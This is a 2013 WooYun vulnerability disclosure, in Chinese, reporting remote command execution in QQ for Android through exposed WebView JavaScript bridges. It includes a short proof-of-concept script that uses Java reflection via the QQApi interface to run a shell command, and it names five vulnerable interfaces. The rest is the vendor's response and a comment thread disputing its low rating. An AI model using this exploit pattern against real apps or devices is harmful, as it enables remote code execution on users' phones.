当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036115

漏洞标题:QQ安卓最新版远程命令执行(可远程种植后门)

相关厂商:腾讯

漏洞作者: 北京方便面

提交时间:2013-09-04 19:05

修复时间:2013-12-03 19:06

公开时间:2013-12-03 19:06

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-04: 细节已通知厂商并且等待厂商处理中
2013-09-06: 厂商已经确认,细节仅向厂商公开
2013-09-09: 细节向第三方安全合作伙伴开放
2013-10-31: 细节向核心白帽子及相关领域专家公开
2013-11-10: 细节向普通白帽子公开
2013-11-20: 细节向实习白帽子公开
2013-12-03: 细节向公众公开

简要描述:

QQ安卓最新版远程命令执行(可远程种植后门)

详细说明:

POC

<script>
function execute(cmdArgs)
{
    return QQApi.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
}
try{
    execute(["/system/bin/sh","-c","echo 'xxx remote command execute' > /sdcard/hi"]);
}catch(e){
    alert(e);
}
</script>


5处接口有漏洞

external
HtmlViewer
mediaPlayerJS
QQApi
securejs


漏洞证明:

QQ图片20130904190205.jpg


QQ图片20130904190159.jpg

修复方案:

版权声明:转载请注明来源 北京方便面@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-09-06 16:36

厂商回复:

首先,非常感谢楼主的报告。
经过与楼主沟通并且参考百度及腾讯对这种披露方式的处理原则,我们确认此漏洞,但是只给1分。
原因如下:
1、在早些时候,这些问题已有报告者联系我们。
2、你的漏洞报告之前,相关的核心漏洞细节已被公开。
3、我们修复后的app发布需要一段时间,为了避免更多的攻击信息扩散,因此我们确认此漏洞,但只给1分。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-09-04 19:24 | 心伤的胖子 ( 普通白帽子 | Rank:308 漏洞数:29 | 因为心伤,所以胖子。)

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  2. 2013-09-04 19:32 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸,懂的人会觉得很...)

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  3. 2013-09-04 19:36 |   ( 路人 | Rank:10 漏洞数:4 |  )

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  4. 2013-09-04 19:46 | xcfres54 ( 路人 | Rank:16 漏洞数:3 )

    不明觉厉

  5. 2013-09-04 19:53 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    。。吓尿

  6. 2013-09-04 20:24 | 西门吹雪 ( 路人 | Rank:15 漏洞数:6 | 人在,塔在)

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  7. 2013-09-04 20:39 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  8. 2013-09-04 20:53 | sdj ( 实习白帽子 | Rank:45 漏洞数:6 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    感谢反馈,该漏洞我们已从其他渠道获知,目前正在排期修复中。

  9. 2013-09-04 20:58 | 艾特绅 ( 路人 | Rank:21 漏洞数:5 | 愿意为网络安全做出我的贡献)

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  10. 2013-09-04 21:07 | 姿势不行 ( 路人 | Rank:22 漏洞数:7 | 我是爱卖萌的小阿狸呀http://www.qinqinyo....)

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  11. 2013-09-04 21:17 | 点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  12. 2013-09-04 21:18 | Lee Swagger ( 路人 | Rank:28 漏洞数:5 | 洗洗睡吧)

    马甲蛮多的

  13. 2013-09-04 21:19 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  14. 2013-09-04 21:40 | iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  15. 2013-09-04 22:12 | 雅柏菲卡 ( 普通白帽子 | Rank:1213 漏洞数:234 | 雙魚座聖鬥士雅柏菲卡)

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  16. 2013-09-04 23:21 | terrying ( 实习白帽子 | Rank:59 漏洞数:15 | 雅蠛蝶)

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  17. 2013-09-05 00:18 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    貌似通杀

  18. 2013-09-05 00:23 | 北京方便面 认证白帽子 ( 核心白帽子 | Rank:876 漏洞数:66 | 我爱吃北京方便面)

    @Blackeagle 非通杀 很早就有的漏洞了 没想到现在还这么多app有

  19. 2013-09-05 00:30 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @北京方便面 这是奔着方便面来的么?

  20. 2013-09-05 07:33 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    NB啊。。

  21. 2013-09-05 10:27 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    已通过其他渠道知晓此问题,正在安排处理中,感谢对腾讯安全的关注。

  22. 2013-09-05 11:44 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    @北京方便面 很早就有了。。。囧,求不黑~

  23. 2013-09-05 11:51 | 北京方便面 认证白帽子 ( 核心白帽子 | Rank:876 漏洞数:66 | 我爱吃北京方便面)

    @心伤的胖子 腾讯私信俺了 说1Rank 还问俺认可不 我现在比你还心伤

  24. 2013-09-05 11:55 | 心伤的胖子 ( 普通白帽子 | Rank:308 漏洞数:29 | 因为心伤,所以胖子。)

    @北京方便面 给你两包北京方便面,不谢!

  25. 2013-09-05 11:56 |   ( 路人 | Rank:10 漏洞数:4 |  )

    @北京方便面 求北京方便面,+1~

  26. 2013-09-05 14:31 | 流星warden ( 实习白帽子 | Rank:54 漏洞数:8 | The quieter you become,the more you are ...)

    感谢反馈,该漏洞已经有人提前报告过,目前正在排期修复中。

  27. 2013-09-05 15:23 | 心伤的胖子 ( 普通白帽子 | Rank:308 漏洞数:29 | 因为心伤,所以胖子。)

    @  他没有,哥这有。

  28. 2013-09-05 15:40 |   ( 路人 | Rank:10 漏洞数:4 |  )

    @心伤的胖子 给我来10箱~

  29. 2013-09-06 16:38 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    我就说腾讯会这样了~~~

  30. 2013-09-06 17:25 | 北京方便面 认证白帽子 ( 核心白帽子 | Rank:876 漏洞数:66 | 我爱吃北京方便面)

    @腾讯 什么叫与我沟通了?我并没有认可这个评分,你们那叫沟通?你们那是通知吧?

  31. 2013-09-06 17:28 | 北京方便面 认证白帽子 ( 核心白帽子 | Rank:876 漏洞数:66 | 我爱吃北京方便面)

    我自始自终并未说认可腾讯的处理方式!

  32. 2013-09-06 17:29 | 北京方便面 认证白帽子 ( 核心白帽子 | Rank:876 漏洞数:66 | 我爱吃北京方便面)

    首先,非常感谢您的报告。我们会在wooyun上确认此漏洞,但是只给1分。 原因: 1、在早些时候,这些问题已有报告者联系我们。 2、你的漏洞报告之前,相关的核心漏洞细节已被公开。 3、我们修复后的app发布需要一段时间,为了避免更多的攻击信息扩散,因此我们确认此漏洞,但只给1分。 最后,再次感谢您的报告。请问是否认可这种处理结果?

  33. 2013-09-06 17:35 | 北京方便面 认证白帽子 ( 核心白帽子 | Rank:876 漏洞数:66 | 我爱吃北京方便面)

    @腾讯 你们的安全部门还算安全部门么?都是搞公关出身的吧?一直听圈里的人说腾讯有个公关部门叫TSRC

  34. 2013-09-06 17:39 | 北京方便面 认证白帽子 ( 核心白帽子 | Rank:876 漏洞数:66 | 我爱吃北京方便面)

    @腾讯 别急着否认 TSRC做了很多公关做的事儿 自己想想你们的本职责任到底是什么吧

  35. 2013-09-06 17:43 | n0bele ( 普通白帽子 | Rank:220 漏洞数:45 | 无耻最寂寞)

    @北京方便面 大胆,不要造谣。你们都是圈里人,腾讯的部分人是分不清啥是漏洞的,所以懒得报了,烂在手里吧.

  36. 2013-09-06 17:48 | 北京方便面 认证白帽子 ( 核心白帽子 | Rank:876 漏洞数:66 | 我爱吃北京方便面)

    @n0bele 就是很感慨 TSRC明明应该是一个安全部门 为什么总在做公关该做的事儿

  37. 2013-09-07 22:45 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    @北京方便面 嘘 你知道得太多了,有好东西藏着 别提交

  38. 2015-02-04 20:34 | 鬼五 ( 普通白帽子 | Rank:214 漏洞数:83 )

    POC怎么利用呢?